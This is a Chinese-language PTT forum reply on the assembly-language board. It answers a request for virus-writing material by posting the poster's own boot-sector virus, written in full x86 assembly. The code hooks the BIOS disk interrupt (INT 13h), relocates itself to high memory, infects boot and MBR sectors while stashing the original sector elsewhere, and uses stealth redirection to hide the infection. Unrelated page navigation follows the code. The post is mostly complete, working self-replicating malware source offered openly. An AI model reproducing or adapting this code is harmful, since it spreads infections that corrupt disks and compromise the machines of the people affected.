ASM 板


LINE

看板 ASM  RSS
※ 引述《fluteoner (1207)》之铭言: : 听说病毒是用组语写的 : 有人知道哪里有教怎麽写病毒的教材吗?? : 我没有要做坏事,只是研究领域是资安, : 想了解病毒攻击电脑的实际例子 : 谢谢 高职写的开机型 XD 作古的玩具 囧rz ORG 0 JMP $ + 0x3B + 3 NOP TIMES 0x3B DB 0 ; CLI ; initial stack pointer, data segment XOR DI, DI MOV SI, 0x7C00 ; MOV SS,DI ; MOV SP,SI MOV DS,DI ; STI DEC WORD [DS:0x413] ; to allocate 1k memory INT 0x12 ; get size of top of memnory SHL AX, 6 ; memory size convert segment 640K = 640*1024 => 2^10/2^4 = 2^(10-4) MOV ES, AX CLD MOV CX, 0x100 REP MOVSW ; move virus code to top of memory SHL EAX, 0x10 ; seg:off to linear address MOV AX, New_INT13h XCHG EAX, [DS:0x4C] ; hook int 13h MOV DI, Prev_INT13h ; backup org int 13h STOSD INT 19h ; reboot, int 13h redirect our int 13h New_INT13h: OR DH, DH ; head 0 ? JNE SHORT Nope CMP CX, 1 ; sector 1 ? JNE SHORT Nope CMP AH, 3 ; function : write sector JE SHORT Avert CMP AH, 2 ; function : read sector JNE SHORT Nope CALL INT13h ; read org sector JNC SHORT Handler ; if no error, the operation is ok Avert: IRET Nope: DB 0xEA ; opcode of jmp Prev_INT13h DD 0 ; org int 13h Handler: PUSHF ; backup all register for modifyed. PUSHA PUSH DS push ES CMP BYTE [ES:BX+$],'&' ; infector ? JE SHORT Stealth MOV AX, 0x301 ; write org boot/mbr to other sector CALL Crafty ; CALL INT13h PUSH ES PUSH CS POP ES POP DS MOV SI, 2 ; move bpb MOV DI, SI ADD SI, BX MOV CX, 0x3C REP MOVSB MOV SI, 0x1BE ; move pt MOV DI, SI ADD SI, BX MOV CX, 64 REP MOVSB MOV AX, 0x301 ; write virus to boot/mbr XOR BX, BX XOR DH, DH MOV CX, 1 CALL INT13h JMP SHORT RETurn Stealth:MOV AX, 0x201 CALL Crafty ;CALL INT13h RETurn: POP ES POP DS POPA POPF RETF 2 Crafty: MOV CX, 14 OR DL, DL JS SHORT INT13h MOV DH, 1 INT13h: PUSHF CALL DWORD [CS:Prev_INT13h] RET TIMES 512-2-($-$$) DB 0 DB 55h, 0AAH -- --



※ 发信站: 批踢踢实业坊(ptt.cc)
◆ From: 210.68.29.67 ※ 编辑: zha0 来自: 210.68.29.67 (10/31 10:55)







like.gif 您可能会有兴趣的文章
icon.png[问题/行为] 猫晚上进房间会不会有憋尿问题
icon.pngRe: [闲聊] 选了错误的女孩成为魔法少女 XDDDDDDDDDD
icon.png[正妹] 瑞典 一张
icon.png[心得] EMS高领长版毛衣.墨小楼MC1002
icon.png[分享] 丹龙隔热纸GE55+33+22
icon.png[问题] 清洗洗衣机
icon.png[寻物] 窗台下的空间
icon.png[闲聊] 双极の女神1 木魔爵
icon.png[售车] 新竹 1997 march 1297cc 白色 四门
icon.png[讨论] 能从照片感受到摄影者心情吗
icon.png[狂贺] 贺贺贺贺 贺!岛村卯月!总选举NO.1
icon.png[难过] 羡慕白皮肤的女生
icon.png阅读文章
icon.png[黑特]
icon.png[问题] SBK S1安装於安全帽位置
icon.png[分享] 旧woo100绝版开箱!!
icon.pngRe: [无言] 关於小包卫生纸
icon.png[开箱] E5-2683V3 RX480Strix 快睿C1 简单测试
icon.png[心得] 苍の海贼龙 地狱 执行者16PT
icon.png[售车] 1999年Virage iO 1.8EXi
icon.png[心得] 挑战33 LV10 狮子座pt solo
icon.png[闲聊] 手把手教你不被桶之新手主购教学
icon.png[分享] Civic Type R 量产版官方照无预警流出
icon.png[售车] Golf 4 2.0 银色 自排
icon.png[出售] Graco提篮汽座(有底座)2000元诚可议
icon.png[问题] 请问补牙材质掉了还能再补吗?(台中半年内
icon.png[问题] 44th 单曲 生写竟然都给重复的啊啊!
icon.png[心得] 华南红卡/icash 核卡
icon.png[问题] 拔牙矫正这样正常吗
icon.png[赠送] 老莫高业 初业 102年版
icon.png[情报] 三大行动支付 本季掀战火
icon.png[宝宝] 博客来Amos水蜡笔5/1特价五折
icon.pngRe: [心得] 新鲜人一些面试分享
icon.png[心得] 苍の海贼龙 地狱 麒麟25PT
icon.pngRe: [闲聊] (君の名は。雷慎入) 君名二创漫画翻译
icon.pngRe: [闲聊] OGN中场影片:失踪人口局 (英文字幕)
icon.png[问题] 台湾大哥大4G讯号差
icon.png[出售] [全国]全新千寻侘草LED灯, 水草

请输入看板名称,例如:iOS站内搜寻

TOP